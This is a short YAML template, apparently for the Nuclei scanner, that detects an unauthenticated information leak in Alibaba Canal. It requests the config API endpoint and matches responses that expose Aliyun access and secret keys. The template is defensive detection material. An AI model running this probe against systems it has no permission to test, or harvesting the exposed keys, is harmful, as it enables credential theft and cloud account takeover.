35 lines
749 B
YAML
35 lines
749 B
YAML
|
id: alibaba-canal-info-leak
|
||
|
|
||
|
info:
|
||
|
name: Alibaba Canal Info Leak
|
||
|
author: pikpikcu
|
||
|
severity: info
|
||
|
|
||
|
# https://github.com/alibaba/canal/issues/632
|
||
|
# https://netty.io/wiki/reference-counted-objects.html
|
||
|
# https://my.oschina.net/u/4581879/blog/4753320
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/api/v1/canal/config/1/1"
|
||
|
headers:
|
||
|
Content-Type: application/json
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
- type: word
|
||
|
words:
|
||
|
- "application/json"
|
||
|
condition: and
|
||
|
part: header
|
||
|
- type: word
|
||
|
words:
|
||
|
- "ncanal.aliyun.accessKey"
|
||
|
- "ncanal.aliyun.secretKey"
|
||
|
condition: and
|
||
|
part: body
|